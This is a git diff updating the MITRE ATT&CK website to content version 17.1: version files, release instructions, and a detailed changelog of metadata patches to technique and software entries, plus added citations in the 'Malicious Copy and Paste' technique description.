diff --git a/CHANGELOG.md b/CHANGELOG.md index 31321a5ebed..c207ffb63da 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,3 +1,10 @@ +# v4.2.3 (2025-05-06) + +## Features + +* Release ATT&CK content version 17.1. + See detailed changes [here](https://github.com/mitre/cti/releases/tag/ATT%26CK-v17.1). + # v4.2.2 (2025-04-22) ## Features diff --git a/data/versions.json b/data/versions.json index c251d558c29..4acef7cef2f 100644 --- a/data/versions.json +++ b/data/versions.json @@ -1,9 +1,9 @@ { "current": { - "name": "v17.0", + "name": "v17.1", "date_start": "April 22, 2025", "changelog": "updates-april-2025", - "cti_url": "https://github.com/mitre/cti/releases/tag/ATT%26CK-v17.0" + "cti_url": "https://github.com/mitre/cti/releases/tag/ATT%26CK-v17.1" }, "previous": [ { diff --git a/docs/RELEASE.md b/docs/RELEASE.md index 21708d51679..ad084b9a9c2 100644 --- a/docs/RELEASE.md +++ b/docs/RELEASE.md @@ -133,6 +133,8 @@ Consult these sections as needed for step 5 in the above list. * Release [ATT&CK content version X.Y](https://github.com/mitre/cti/releases/tag/ATT%26CK-vX.Y). See the release notes [here](https://attack.mitre.org/resources/updates/updates--/). ``` +* Update the `layer_version` and `navigator_version` in `modules/site_config.py` if navigator version or navigator layer version has been updated.
+Check the layer specification version [here](https://github.com/mitre-attack/attack-navigator/blob/master/layers/spec/) and the navigator version [here](https://github.com/mitre-attack/attack-navigator/blob/master/CHANGELOG.md). ### Minor release @@ -150,3 +152,5 @@ Consult these sections as needed for step 5 in the above list. * Release ATT&CK content version X.Y. See detailed changes [here](https://github.com/mitre/cti/releases/tag/ATT%26CK-vX.Y). ``` +* Update the `layer_version` and `navigator_version` in `modules/site_config.py` if navigator version or navigator layer version has been updated.
+Check the layer specification version [here](https://github.com/mitre-attack/attack-navigator/blob/master/layers/spec/) and the navigator version [here](https://github.com/mitre-attack/attack-navigator/blob/master/CHANGELOG.md). diff --git a/modules/resources/docs/changelogs/v17.0-v17.1/changelog-detailed.html b/modules/resources/docs/changelogs/v17.0-v17.1/changelog-detailed.html new file mode 100644 index 00000000000..9b22c9645b6 --- /dev/null +++ b/modules/resources/docs/changelogs/v17.0-v17.1/changelog-detailed.html @@ -0,0 +1,93 @@ + + + + ATT&CK Changes + + + + +

ATT&CK Changes Between v17.0 and v17.1

Key

+ + + + +
+ + + + + +
Colors for description field
Added
Changed
Deleted
+
+

Additional formats

+

These ATT&CK Navigator layer files can be uploaded to ATT&CK Navigator manually.

+ +

This JSON file contains the machine readble output used to create this page: changelog.json

+

Techniques

enterprise-attack

Patches

[T1546.011] Event Triggered Execution: Application Shimming

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:26.274000+00:002025-04-25 14:46:29.459000+00:00

[T1055.004] Process Injection: Asynchronous Procedure Call

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:44.390000+00:002025-04-25 14:47:11.435000+00:00

[T1102.002] Web Service: Bidirectional Communication

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:03.009000+00:002025-04-25 14:47:51.598000+00:00

[T1027.001] Obfuscated Files or Information: Binary Padding

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:17.215000+00:002025-04-25 14:46:48.991000+00:00

[T1185] Browser Session Hijacking

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:32.147000+00:002025-04-25 15:15:33.428000+00:00

[T1574.012] Hijack Execution Flow: COR_PROFILER

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:25.301000+00:002025-04-25 14:48:41.257000+00:00

[T1559.001] Inter-Process Communication: Component Object Model

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:18.425000+00:002025-04-25 14:46:14.161000+00:00

[T1218.002] System Binary Proxy Execution: Control Panel

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:29.962000+00:002025-04-25 14:46:37.731000+00:00

[T1568.003] Dynamic Resolution: DNS Calculation

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:47.388000+00:002025-04-25 14:47:18.343000+00:00

[T1102.001] Web Service: Dead Drop Resolver

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:22.651000+00:002025-04-25 14:48:36.031000+00:00

[T1491] Defacement

Current version: 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:33.958000+00:002025-04-25 15:15:35.374000+00:00

[T1600.002] Weaken Encryption: Disable Crypto Hardware

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:45.787000+00:002025-04-25 14:47:14.891000+00:00

[T1090.004] Proxy: Domain Fronting

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:20.863000+00:002025-04-25 14:48:02.492000+00:00

[T1601.002] Modify System Image: Downgrade System Image

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:24.391000+00:002025-04-25 14:48:39.086000+00:00

[T1568] Dynamic Resolution

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:44.211000+00:002025-04-25 15:15:46.359000+00:00

[T1055.011] Process Injection: Extra Window Memory Injection

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:00.917000+00:002025-04-25 14:45:37.275000+00:00

[T1008] Fallback Channels

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:20.736000+00:002025-04-25 15:16:21.879000+00:00

[T1568.001] Dynamic Resolution: Fast Flux DNS

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:16.171000+00:002025-04-25 14:46:09.378000+00:00

[T1558.001] Steal or Forge Kerberos Tickets: Golden Ticket

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:42.362000+00:002025-04-25 14:47:07.443000+00:00

[T1564.005] Hide Artifacts: Hidden File System

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:14.404000+00:002025-04-25 14:48:18.639000+00:00

[T1564.001] Hide Artifacts: Hidden Files and Directories

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:19.293000+00:002025-04-25 14:48:27.868000+00:00

[T1176.002] Software Extensions: IDE Extensions

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:37.231000+00:002025-04-23 12:40:46.664000+00:00
x_mitre_contributors[0]Raghvendra MishraRaghvendra Mishra, Arista Networks

[T1219.001] Remote Access Tools: IDE Tunneling

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Purinut Wongwaiwuttiguldej']
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:42.909000+00:002025-04-22 16:34:13.454000+00:00

[T1505.004] Server Software Component: IIS Components

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:59.560000+00:002025-04-25 14:47:43.995000+00:00

[T1525] Implant Internal Image

Current version: 2.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:29.793000+00:002025-04-25 15:15:30.983000+00:00

[T1218.004] System Binary Proxy Execution: InstallUtil

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:17.302000+00:002025-04-25 14:46:11.581000+00:00

[T1016.001] System Network Configuration Discovery: Internet Connection Discovery

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:08.048000+00:002025-04-25 14:45:52.631000+00:00

[T1114.001] Email Collection: Local Email Collection

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:12.090000+00:002025-04-25 14:46:00.964000+00:00

[T1204.004] User Execution: Malicious Copy and Paste

Current version: 1.0

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +

Old Description
New Description
t1An adversary may rely upon a user copying and pasting code it1An adversary may rely upon a user copying and pasting code i
>n order to gain execution. Users may be subjected to social >n order to gain execution. Users may be subjected to social 
>engineering to get them to copy and paste code directly into>engineering to get them to copy and paste code directly into
> a [Command and Scripting Interpreter](https://attack.mitre.> a [Command and Scripting Interpreter](https://attack.mitre.
>org/techniques/T1059).    Malicious websites, such as those >org/techniques/T1059).    Malicious websites, such as those 
>used in [Drive-by Compromise](https://attack.mitre.org/techn>used in [Drive-by Compromise](https://attack.mitre.org/techn
>iques/T1189), may present fake error messages or CAPTCHA pro>iques/T1189), may present fake error messages or CAPTCHA pro
>mpts that instruct users to open a terminal or the Windows R>mpts that instruct users to open a terminal or the Windows R
>un Dialog box and execute an arbitrary command. These comman>un Dialog box and execute an arbitrary command. These comman
>ds may be obfuscated using encoding or other techniques to c>ds may be obfuscated using encoding or other techniques to c
>onceal malicious intent. Once executed, the adversary will t>onceal malicious intent. Once executed, the adversary will t
>ypically be able to establish a foothold on the victim's mac>ypically be able to establish a foothold on the victim's mac
>hine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoi>hine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoi
>a ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)  Advers>a ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)(Citatio
>aries may also leverage phishing emails for this purpose. Wh>n: AhnLab LummaC2 2025)  Adversaries may also leverage phish
>en a user attempts to open an attachment, they may be presen>ing emails for this purpose. When a user attempts to open an
>ted with a fake error and offered a malicious command to pas> attachment, they may be presented with a fake error and off
>te as a solution.(Citation: Proofpoint ClickFix 2024)   Tric>ered a malicious command to paste as a solution.(Citation: P
>king a user into executing a command themselves may help to >roofpoint ClickFix 2024)(Citation: AhnLab Malicioys Copy Pas
>bypass email filtering, browser sandboxing, or other mitigat>te 2024)  Tricking a user into executing a command themselve
>ions designed to protect users against malicious downloaded >s may help to bypass email filtering, browser sandboxing, or
>files. > other mitigations designed to protect users against malicio
 >us downloaded files. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_remote_supportFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:15.487000+00:002025-04-30 17:53:48.667000+00:00
descriptionAn adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). + +Malicious websites, such as those used in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024) + +Adversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution.(Citation: Proofpoint ClickFix 2024) + +Tricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files. An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). + +Malicious websites, such as those used in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)(Citation: AhnLab LummaC2 2025) + +Adversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution.(Citation: Proofpoint ClickFix 2024)(Citation: AhnLab Malicioys Copy Paste 2024) + +Tricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files.
x_mitre_contributors[6]seungyoul.yoo@ahnlab.comSeungYoul Yoo, Ahn Lab
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'AhnLab Malicioys Copy Paste 2024', 'description': 'AhnLab SEcurity intelligence Center. (2024, May 23). Warning Against Phishing Emails Prompting Execution of Commands via Paste (CTRL+V). Retrieved April 23, 2025.', 'url': 'https://asec.ahnlab.com/en/73952/'}
external_references{'source_name': 'AhnLab LummaC2 2025', 'description': 'AhnLab SEcurity intelligence Center. (2025, January 8). Infostealer LummaC2 Spreading Through Fake CAPTCHA Verification Page. Retrieved April 23, 2025.', 'url': 'https://asec.ahnlab.com/en/85699/'}

[T1204.003] User Execution: Malicious Image

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:58.109000+00:002025-04-25 14:47:40.745000+00:00

[T1601] Modify System Image

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:57.683000+00:002025-04-25 15:15:59.227000+00:00

[T1218.005] System Binary Proxy Execution: Mshta

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:47.701000+00:002025-04-25 14:47:18.707000+00:00

[T1104] Multi-Stage Channels

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:48.060000+00:002025-04-25 15:15:50.032000+00:00

[T1599.001] Network Boundary Bridging: Network Address Translation Traversal

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:30.055000+00:002025-04-25 14:46:38.101000+00:00

[T1602.002] Data from Configuration Repository: Network Device Configuration Dump

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:31.045000+00:002025-04-25 14:46:40.804000+00:00

[T1132.002] Data Encoding: Non-Standard Encoding

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:11.823000+00:002025-04-25 14:48:12.613000+00:00

[T1218.008] System Binary Proxy Execution: Odbcconf

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:39.912000+00:002025-04-25 14:47:01.231000+00:00

[T1102.003] Web Service: One-Way Communication

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:53.389000+00:002025-04-25 14:47:30.432000+00:00

[T1601.001] Modify System Image: Patch System Image

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:10.610000+00:002025-04-25 14:48:09.178000+00:00

[T1120] Peripheral Device Discovery

Current version: 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:16.397000+00:002025-04-25 15:15:22.038000+00:00

[T1205.001] Traffic Signaling: Port Knocking

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:49.044000+00:002025-04-25 14:47:21.421000+00:00

[T1055.002] Process Injection: Portable Executable Injection

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:46.232000+00:002025-04-25 14:47:15.984000+00:00

[T1055.009] Process Injection: Proc Memory

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:10.291000+00:002025-04-25 14:48:08.263000+00:00

[T1564.010] Hide Artifacts: Process Argument Spoofing

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:25.123000+00:002025-04-25 14:48:40.519000+00:00

[T1055.013] Process Injection: Process Doppelgänging

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:40.683000+00:002025-04-25 14:47:03.621000+00:00

[T1090] Proxy

Current version: 3.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:41.686000+00:002025-04-25 15:15:44.084000+00:00

[T1055.008] Process Injection: Ptrace System Calls

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:18.215000+00:002025-04-25 14:48:25.896000+00:00

[T1542.004] Pre-OS Boot: ROMMONkit

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:55.910000+00:002025-04-25 14:47:36.549000+00:00

[T1600.001] Weaken Encryption: Reduce Key Space

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:23.689000+00:002025-04-25 14:46:24.048000+00:00

[T1218.009] System Binary Proxy Execution: Regsvcs/Regasm

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:05.911000+00:002025-04-25 14:47:58.456000+00:00

[T1219.003] Remote Access Tools: Remote Access Hardware

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 17:20:16.375000+00:002025-05-02 19:13:42.314000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsMichael Davis, ServiceNow Threat Intelligence
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_contributorsMichael Davis @ ServiceNow Threat Intelligence

[T1578.004] Modify Cloud Compute Infrastructure: Revert Cloud Instance

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:03.446000+00:002025-04-25 14:45:42.495000+00:00

[T1207] Rogue Domain Controller

Current version: 2.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:32.959000+00:002025-04-25 15:15:34.258000+00:00

[T1134.005] Access Token Manipulation: SID-History Injection

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:00.556000+00:002025-04-25 14:47:45.982000+00:00

[T1602.001] Data from Configuration Repository: SNMP (MIB Dump)

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:19.943000+00:002025-04-25 14:48:29.549000+00:00

[T1562.009] Impair Defenses: Safe Mode Boot

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:15.415000+00:002025-04-25 14:46:08.076000+00:00

[T1547.005] Boot or Logon Autostart Execution: Security Support Provider

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:30.225000+00:002025-04-25 14:46:38.641000+00:00

[T1574.010] Hijack Execution Flow: Services File Permissions Weakness

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:18.533000+00:002025-04-25 14:47:32.419000+00:00

[T1558.002] Steal or Forge Kerberos Tickets: Silver Ticket

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:10.698000+00:002025-04-25 14:48:09.547000+00:00

[T1036.006] Masquerading: Space after Filename

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:22.189000+00:002025-04-25 14:48:22.412000+00:00

[T1001.002] Data Obfuscation: Steganography

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:20.025000+00:002025-04-25 14:48:29.907000+00:00

[T1548.003] Abuse Elevation Control Mechanism: Sudo and Sudo Caching

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:08.135000+00:002025-04-25 14:45:52.996000+00:00

[T1614.001] System Location Discovery: System Language Discovery

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:04.692000+00:002025-04-25 14:47:55.750000+00:00

[T1542.005] Pre-OS Boot: TFTP Boot

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:15.890000+00:002025-04-25 14:46:08.824000+00:00

[T1221] Template Injection

Current version: 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:13.447000+00:002025-04-25 15:16:15.516000+00:00

[T1055.003] Process Injection: Thread Execution Hijacking

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:26.012000+00:002025-04-25 14:46:28.558000+00:00

[T1055.005] Process Injection: Thread Local Storage

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:16.376000+00:002025-04-25 14:48:21.860000+00:00

[T1505.002] Server Software Component: Transport Agent

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:21.139000+00:002025-04-25 14:46:19.364000+00:00

[T1546.005] Event Triggered Execution: Trap

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:36.056000+00:002025-04-25 14:46:52.100000+00:00

[T1564.007] Hide Artifacts: VBA Stomping

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:06.926000+00:002025-04-25 14:48:00.627000+00:00

[T1125] Video Capture

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:17.864000+00:002025-04-25 15:15:42.332000+00:00

[T1600] Weaken Encryption

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:12.571000+00:002025-04-25 15:15:15.040000+00:00

mobile-attack

Patches

[T1577] Compromise Application Executable

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:21:56.351000+00:002025-04-25 15:16:40.355000+00:00

[T1617] Hooking

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:21:55.543000+00:002025-04-25 15:16:39.824000+00:00

[T1603] Scheduled Task/Job

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:21:43.650000+00:002025-04-25 15:16:26.617000+00:00

ics-attack

Patches

[T0800] Activate Firmware Update Mode

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:10.552000+00:002025-04-25 15:16:44.679000+00:00

[T0872] Indicator Removal on Host

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:14.295000+00:002025-04-25 15:16:47.841000+00:00

[T0801] Monitor Process State

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:12.337000+00:002025-04-25 15:16:45.982000+00:00

[T0845] Program Upload

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:12.867000+00:002025-04-25 15:16:46.293000+00:00

[T0852] Screen Capture

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:18.404000+00:002025-04-25 15:16:51.447000+00:00

[T0869] Standard Application Layer Protocol

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:19.328000+00:002025-04-25 15:16:52.173000+00:00

[T0882] Theft of Operational Information

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:17.698000+00:002025-04-25 15:16:50.981000+00:00

Software

enterprise-attack

Patches

[S0066] 3PARA RAT

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:18.768000+00:002025-04-25 14:43:49.838000+00:00

[S0065] 4H RAT

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:22.132000+00:002025-04-25 14:44:01.375000+00:00

[S0469] ABK

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
